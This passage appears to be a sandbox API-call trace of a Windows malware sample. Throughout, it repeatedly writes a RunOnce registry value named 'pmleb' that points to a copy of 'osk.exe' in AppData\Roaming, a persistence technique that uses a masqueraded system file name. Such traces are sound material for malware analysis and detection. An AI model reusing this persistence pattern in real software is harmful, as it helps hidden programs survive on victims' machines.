lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.614] RegCloseKey (hKey=0x280) returned 0x0 [0098.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.615] SetTimer (hWnd=0x20280, nIDEvent=0x22ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ec [0098.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.629] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.629] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.629] KillTimer (hWnd=0x20280, uIDEvent=0x22ec) returned 1 [0098.629] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.629] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.629] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.630] RegCloseKey (hKey=0x280) returned 0x0 [0098.630] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.630] SetTimer (hWnd=0x20280, nIDEvent=0x22ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ed [0098.630] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.644] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.645] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.645] KillTimer (hWnd=0x20280, uIDEvent=0x22ed) returned 1 [0098.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.646] RegCloseKey (hKey=0x280) returned 0x0 [0098.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.646] SetTimer (hWnd=0x20280, nIDEvent=0x22ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ee [0098.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.660] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.661] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.661] KillTimer (hWnd=0x20280, uIDEvent=0x22ee) returned 1 [0098.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.661] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.661] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.662] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.662] RegCloseKey (hKey=0x280) returned 0x0 [0098.662] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.662] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.662] SetTimer (hWnd=0x20280, nIDEvent=0x22ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ef [0098.662] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.675] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.675] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.676] KillTimer (hWnd=0x20280, uIDEvent=0x22ef) returned 1 [0098.676] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.676] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.676] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.676] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.677] RegCloseKey (hKey=0x280) returned 0x0 [0098.677] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.677] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.677] SetTimer (hWnd=0x20280, nIDEvent=0x22f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f0 
[0098.677] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.691] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.691] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.692] KillTimer (hWnd=0x20280, uIDEvent=0x22f0) returned 1 [0098.692] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.692] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.692] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.692] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.692] RegCloseKey (hKey=0x280) returned 0x0 [0098.693] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.693] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.693] SetTimer (hWnd=0x20280, nIDEvent=0x22f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f1 [0098.693] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.707] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.707] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.707] KillTimer (hWnd=0x20280, uIDEvent=0x22f1) returned 1 [0098.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.707] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.707] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.708] RegCloseKey (hKey=0x280) returned 0x0 [0098.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.708] SetTimer (hWnd=0x20280, nIDEvent=0x22f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f2 [0098.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.722] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.722] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.722] KillTimer (hWnd=0x20280, uIDEvent=0x22f2) returned 1 [0098.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.723] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.723] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.723] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.723] RegCloseKey (hKey=0x280) returned 0x0 [0098.723] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.723] SetTimer (hWnd=0x20280, nIDEvent=0x22f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f3 [0098.723] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0098.738] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.738] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.739] KillTimer (hWnd=0x20280, uIDEvent=0x22f3) returned 1 [0098.739] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.739] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.739] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.740] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.740] RegCloseKey (hKey=0x280) returned 0x0 [0098.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.740] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.740] SetTimer (hWnd=0x20280, nIDEvent=0x22f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f4 [0098.740] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.756] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.756] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.757] KillTimer (hWnd=0x20280, uIDEvent=0x22f4) returned 1 [0098.757] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.757] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.757] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.757] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.758] RegCloseKey (hKey=0x280) returned 0x0 [0098.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.758] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.758] SetTimer (hWnd=0x20280, nIDEvent=0x22f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f5 [0098.758] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.769] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.769] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.769] KillTimer (hWnd=0x20280, uIDEvent=0x22f5) returned 1 [0098.769] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.770] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.770] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.770] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.770] RegCloseKey (hKey=0x280) returned 0x0 [0098.770] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.770] SetTimer (hWnd=0x20280, nIDEvent=0x22f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f6 [0098.770] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.785] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.785] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.785] KillTimer (hWnd=0x20280, uIDEvent=0x22f6) returned 1 [0098.785] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.785] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.785] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.786] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.786] RegCloseKey (hKey=0x280) returned 0x0 [0098.786] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.786] SetTimer (hWnd=0x20280, nIDEvent=0x22f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f7 [0098.786] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.800] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.800] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.800] KillTimer (hWnd=0x20280, uIDEvent=0x22f7) returned 1 [0098.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.801] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.801] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.801] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.801] RegCloseKey (hKey=0x280) returned 0x0 [0098.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.801] SetTimer (hWnd=0x20280, nIDEvent=0x22f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f8 [0098.801] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.817] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.817] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.817] KillTimer (hWnd=0x20280, uIDEvent=0x22f8) returned 1 [0098.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.818] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.818] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.818] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.818] RegCloseKey (hKey=0x280) returned 0x0 [0098.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.819] SetTimer (hWnd=0x20280, nIDEvent=0x22f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22f9 [0098.819] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.831] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.831] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.832] KillTimer (hWnd=0x20280, 
uIDEvent=0x22f9) returned 1 [0098.832] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.832] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.832] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.832] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.833] RegCloseKey (hKey=0x280) returned 0x0 [0098.833] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.833] SetTimer (hWnd=0x20280, nIDEvent=0x22fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fa [0098.833] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.848] KillTimer (hWnd=0x20280, uIDEvent=0x22fa) returned 1 [0098.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.849] RegCloseKey (hKey=0x280) returned 0x0 [0098.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.849] SetTimer (hWnd=0x20280, nIDEvent=0x22fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fb [0098.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.863] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.863] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.863] KillTimer (hWnd=0x20280, uIDEvent=0x22fb) returned 1 [0098.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.863] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.864] RegCloseKey (hKey=0x280) returned 0x0 [0098.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.864] SetTimer (hWnd=0x20280, nIDEvent=0x22fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fc [0098.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.878] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.878] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.878] KillTimer (hWnd=0x20280, uIDEvent=0x22fc) returned 1 [0098.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.879] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.879] RegCloseKey (hKey=0x280) returned 0x0 [0098.879] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.880] SetTimer (hWnd=0x20280, nIDEvent=0x22fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fd [0098.880] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.894] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.894] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.894] KillTimer (hWnd=0x20280, uIDEvent=0x22fd) returned 1 [0098.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.895] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.895] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.895] RegCloseKey (hKey=0x280) returned 0x0 
